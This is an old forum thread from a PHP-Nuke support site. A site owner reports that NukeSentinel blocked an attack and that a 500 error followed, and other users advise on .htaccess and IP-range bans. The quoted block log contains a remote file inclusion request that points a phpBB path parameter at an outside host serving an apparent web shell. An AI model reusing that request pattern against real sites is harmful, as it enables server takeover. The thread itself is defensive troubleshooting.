Ravens PHP Scripts: Forums
 

 

View next topic
View previous topic
This forum is locked: you cannot post, reply to, or edit topics.   This topic is locked: you cannot edit posts or make replies.    Ravens PHP Scripts And Web Hosting Forum Index -> NukeSentinel™ v2.4.x
Author Message
Gazanimal
Hangin' Around


Joined: Nov 29, 2005
Posts: 47

PostPosted: Fri Sep 29, 2006 8:42 am Reply with quote

Hi guys.

I got an email notifying me that someone had made an attack on my website, specifically my forums & that Sentinel had repelled them. Good job Very Happy

However, after the attempted intrusion my website suffered a "500 - Internal Server Error" everytime someone tried to connect.

The email did shed some light onto the problem (which I've posted below) but I can access the website fine if I delete the .htaccess.

Quote:
Date & Time: 2006-09-29 03:47:25 BST GMT +0100
Blocked IP: 72.20.3.*
User ID: Anonymous (1)
Reason: Abuse-Filter
--------------------
User Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Query String: noegoclan.co.uk/web/modules.php?name=Forums_ug_auth.php?phpbb_root_path=http://www.bob.7tfi.com/c100.txt
Get String: noegoclan.co.uk/web/modules.php?name=Forums_ug_auth.php?phpbb_root_path=http://www.bob.7tfi.com/c100.txt
Post String: noegoclan.co.uk/web/modules.php
Forwarded For: none
Client IP: none
Remote Address: 72.20.3.58
Remote Port: 3277
Request Method: GET
--------------------
Who-Is for IP
72.20.3.58


As you can see they tried to use some kind of trojan script in a text file.

*WARNING* I'd not advise anyone to visit the url included in the email as my anti-virus picked it up & blocked it so be aware.

Also, the only thing in my .htaccess file is the IP of the attacker, nothing else.

Quote:

deny from 72.20.3


In Sentinel I have it set to "Admin - HTTPAuth".

If I delete the .htacess from my website it works perfect, but before the attack it worked great & not had any problem. IS there something else wrong that is casuing the error?

Thanks for any help as I'm not a website guru & value the help. Smile
 
View user's profile Send private message
hitwalker
Sells PC To Pay For Divorce


Joined:
Posts: 5661

PostPosted: Fri Sep 29, 2006 8:54 am Reply with quote

kick out the ip..
72.20.3

that doesnt exist and is incomplete.
 
View user's profile Send private message
Gazanimal
PostPosted: Fri Sep 29, 2006 9:27 am Reply with quote

The IP blocking config in Sentinel is set to:

Quote:
1 Octet (127.3.4.*)


Should I change it to full IP or add in the full IP of the hacker instead as I do have that?

I have Sentinel also set to write to .htaccess when someone is blocked but should I set it to not to write to .htacess? Will the IP still be blocked if not??
 
srhh
Involved
Involved


Joined: Dec 27, 2005
Posts: 296

PostPosted: Fri Sep 29, 2006 9:33 am Reply with quote

Hmm, I could be mistaken, but I think it's safer to leave the sub-net included in bans.
The banned IP will still be in the database too after you delete it from the htaccess file.
 
View user's profile Send private message
Gazanimal
PostPosted: Fri Sep 29, 2006 9:41 am Reply with quote

I'm starting to think that my webhost doesn't like the use of .htaccess if I remember correctly.

I might need to alter my Sentinel settings to not write to .htaccess when an attack is logged & leave it included in the database.

So should I use Full IP or only partial?
 
evaders99
Former Moderator in Good Standing


Joined: Apr 30, 2004
Posts: 3221

PostPosted: Fri Sep 29, 2006 11:35 am Reply with quote

That subnet seems to be owned by Staminus Communications, a US company.
My guess is that it is just one hacked server. So you probably can just ban the specific IP - 72.20.3.58

If it were known hacker groups, say in Turkey or Russia, I would have recommended banning the entire ISP subnet.

_________________
- Only registered users can see links on this board! Get registered or login! -

Need help? Only registered users can see links on this board! Get registered or login! 
View user's profile Send private message Visit poster's website
Gazanimal
PostPosted: Fri Sep 29, 2006 1:28 pm Reply with quote

Cheers guys, I'll ban the specific user.

Is it easy to ban specific ranges of IP's for countries?Bearing in mind that I can't use .htaccess
 
hitwalker
PostPosted: Fri Sep 29, 2006 1:35 pm Reply with quote

Cannot use htaccess?
If thats so i suggest you get another host..
 
evaders99
PostPosted: Sun Oct 01, 2006 9:26 pm Reply with quote

Yes it is easy to ban the entire country using Sentinel.
I don't know if .htaccess is being written too as well, but it is quite useful to ban on the server level. That would stop them from accessing anything on your site. Sentinel bans w/o .htaccess would only protect scripts running through phpNuke
 
Display posts from previous:       
This forum is locked: you cannot post, reply to, or edit topics.   This topic is locked: you cannot edit posts or make replies.    Ravens PHP Scripts And Web Hosting Forum Index -> NukeSentinel™ v2.4.x

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©